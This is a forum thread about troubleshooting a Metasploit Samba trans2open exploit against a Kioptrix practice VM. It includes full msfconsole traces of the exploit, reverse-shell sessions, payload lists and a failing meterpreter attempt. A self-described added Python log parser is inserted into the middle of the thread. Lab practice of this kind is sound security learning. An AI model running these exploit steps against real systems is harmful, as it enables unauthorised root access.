Metasploit meterpreter



nix
2013-05-20, 02:53
So I created a VM and put Kioptrix on it,
ran Metasploit and used the Samba exploit (exploit/linux/samba/trans2open).

It was successful.
Then I tried to use Meterpreter, however it would not connect.

I was able to get the shell session but not Meterpreter.
No errors, it just keeps on trying.

Anyone had similar issues?

root-boy
2013-05-20, 08:06
Can you show us a trace of what you did exactly and the output so we can have a better idea on your problem.

nix
2013-05-20, 14:40
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.108    yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce


msf exploit(trans2open) > sessions

Active sessions
===============

No active sessions.

msf exploit(trans2open) > exploit

Started reverse handler on 192.168.1.140:4444
Trying return address 0xbffffdfc...
Trying return address 0xbffffcfc...
Trying return address 0xbffffbfc...
Trying return address 0xbffffafc...
Trying return address 0xbffff9fc...
Command shell session 1 opened (192.168.1.140:4444 -> 192.168.1.108:32769) at 2013-05-20 10:34:05 -0400
Command shell session 2 opened (192.168.1.140:4444 -> 192.168.1.108:32770) at 2013-05-20 10:34:06 -0400

exit

192.168.1.108 - Command shell session 2 closed. Reason: Died from EOFError
msf exploit(trans2open) > show payloads

Compatible Payloads
===================

   Name                                      Disclosure Date  Rank    Description
   ----                                      ---------------  ----    -----------
   generic/custom                                             normal  Custom Payload
   generic/debug_trap                                         normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                     normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                  normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                         normal  Generic x86 Tight Loop
   linux/x86/adduser                                          normal  Linux Add User
   linux/x86/chmod                                            normal  Linux Chmod
   linux/x86/exec                                             normal  Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp                        normal  Linux Meterpreter, Bind TCP Stager (IPv6)
   linux/x86/meterpreter/bind_nonx_tcp                        normal  Linux Meterpreter, Bind TCP Stager
   linux/x86/meterpreter/bind_tcp                             normal  Linux Meterpreter, Bind TCP Stager
   linux/x86/meterpreter/reverse_ipv6_tcp                     normal  Linux Meterpreter, Reverse TCP Stager (IPv6)
   linux/x86/meterpreter/reverse_nonx_tcp                     normal  Linux Meterpreter, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp                          normal  Linux Meterpreter, Reverse TCP Stager
   linux/x86/metsvc_bind_tcp                                  normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp                               normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/read_file                                        normal  Linux Read File
   linux/x86/shell/bind_ipv6_tcp                              normal  Linux Command Shell, Bind TCP Stager (IPv6)
   linux/x86/shell/bind_nonx_tcp                              normal  Linux Command Shell, Bind TCP Stager
   linux/x86/shell/bind_tcp                                   normal  Linux Command Shell, Bind TCP Stager
   linux/x86/shell/reverse_ipv6_tcp                           normal  Linux Command Shell, Reverse TCP Stager (IPv6)
   linux/x86/shell/reverse_nonx_tcp                           normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp                                normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell_bind_ipv6_tcp                              normal  Linux Command Shell, Bind TCP Inline (IPv6)
   linux/x86/shell_bind_tcp                                   normal  Linux Command Shell, Bind TCP Inline
   linux/x86/shell_reverse_tcp                                normal  Linux Command Shell, Reverse TCP Inline
   linux/x86/shell_reverse_tcp2                               normal  Linux Command Shell, Reverse TCP Inline - Metasm Demo

msf exploit(trans2open) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.108    yes       The target address
   RPORT  139              yes       The target port


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   PrependFork                    no        Add a fork() / exit_group() (for parent) code
   RHOST         192.168.1.108    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

Now when I run exploit I get the following... it keeps on going, trying to find a return address:


msf exploit(trans2open) > exploit

Started bind handler
Trying return address 0xbffffdfc...
Trying return address 0xbffffcfc...
Trying return address 0xbffffbfc...
Trying return address 0xbffffafc...
Transmitting intermediate stager for over-sized stage...(100 bytes)
Trying return address 0xbffff9fc...
Sending stage (1126400 bytes) to 192.168.1.108
Trying return address 0xbffff8fc...
Trying return address 0xbffff7fc...
Trying return address 0xbffff6fc...
Trying return address 0xbffff5fc...
Trying return address 0xbffff4fc...
Trying return address 0xbffff3fc...
Trying return address 0xbffff2fc...
Trying return address 0xbffff1fc...
Trying return address 0xbffff0fc...
Trying return address 0xbfffeffc...
Trying return address 0xbfffeefc...
Trying return address 0xbfffedfc...
Trying return address 0xbfffecfc...
Trying return address 0xbfffebfc...
Trying return address 0xbfffeafc...
Trying return address 0xbfffe9fc...
Trying return address 0xbfffe8fc...
Trying return address 0xbfffe7fc...
Trying return address 0xbfffe6fc...
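A small parser for the two msfconsole traces above, added here as an example and not part of the thread or of Metasploit itself. It summarises one exploit run (handler type, return addresses tried, whether a stage was sent, sessions opened and closed) and states the difference the poster is describing: in the first run sessions open, in the second the stage goes out and the module simply keeps brute-forcing. The two embedded runs are constructed excerpts modelled on the quoted output.

```python
import re
# Constructed excerpts modelled on the two runs quoted above: shell payload, then meterpreter bind_tcp.
SHELL_RUN = """Started reverse handler on 192.168.1.140:4444
Command shell session 1 opened (192.168.1.140:4444 -> 192.168.1.108:32769) at 2013-05-20 10:34:05 -0400
Command shell session 2 opened (192.168.1.140:4444 -> 192.168.1.108:32770) at 2013-05-20 10:34:06 -0400
192.168.1.108 - Command shell session 2 closed. Reason: Died from EOFError
"""
METER_RUN = """Started bind handler
Trying return address 0xbffffdfc...
Trying return address 0xbffffcfc...
Transmitting intermediate stager for over-sized stage...(100 bytes)
Sending stage (1126400 bytes) to 192.168.1.108
Trying return address 0xbffffbfc...
Trying return address 0xbffffafc...
"""
RE_HANDLER = re.compile(r"Started (\w+) handler")
RE_TRY = re.compile(r"Trying return address (0x[0-9a-fA-F]+)")
RE_STAGE = re.compile(r"Sending stage \((\d+) bytes\) to (\S+)")
RE_OPEN = re.compile(r"(\w+) session (\d+) opened \((\S+) -> (\S+)\)")
RE_CLOSE = re.compile(r"session (\d+) closed\.\s+Reason: (.+)")

def parse_msf_output(text):
    """Summarise one run: handler type, return addresses tried, stage sent, sessions opened/closed."""
    s = {"handler": None, "addresses": [], "stage": None, "opened": {}, "closed": {}, "tries_after_stage": 0}
    for line in text.splitlines():
        if m := RE_HANDLER.search(line):
            s["handler"] = m.group(1)
        elif m := RE_TRY.search(line):
            s["addresses"].append(int(m.group(1), 16))
            if s["stage"]:  # still brute-forcing after the stage went out: nothing came back
                s["tries_after_stage"] += 1
        elif m := RE_STAGE.search(line):
            s["stage"] = (int(m.group(1)), m.group(2))
        elif m := RE_OPEN.search(line):
            s["opened"][int(m.group(2))] = (m.group(1), m.group(3), m.group(4))
        elif m := RE_CLOSE.search(line):
            s["closed"][int(m.group(1))] = m.group(2).strip()
    return s

def diagnose(s):
    """Classify the run the way a reader of the trace would: did the payload ever call back?"""
    live = [sid for sid in s["opened"] if sid not in s["closed"]]
    if live:
        return f"ok: {len(live)} live session(s) via {s['handler']} handler"
    if s["opened"]:
        return "sessions opened but all closed: " + "; ".join(s["closed"].values())
    if s["stage"]:
        size, target = s["stage"]
        return f"stage of {size} bytes sent to {target} but no session opened; module kept trying ({s['tries_after_stage']} more return addresses)"
    return f"no stage sent after {len(s['addresses'])} return-address attempts"
```

Running `diagnose(parse_msf_output(...))` over a saved msfconsole log gives a one-line verdict per run, which is handy when comparing several payload attempts like the ones in this thread.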

nix
2013-05-20, 18:02
I even tried the payload linux/x86/meterpreter/reverse_tcp and set the LHOST to my machine, but I get the same thing.

I'm able to get a shell and I'm fully logged in to the system as root, but I can't get Meterpreter to work.

root-boy
2013-05-23, 08:42
Looks like the shellcode is somehow broken; try playing with the encoders to use at run time. Not sure if this will solve the problem.

nix
2013-05-25, 04:29
I'm not sure I understand... what do you mean, the shellcode is broken? Do you mean the payload?

Thanks,

Nix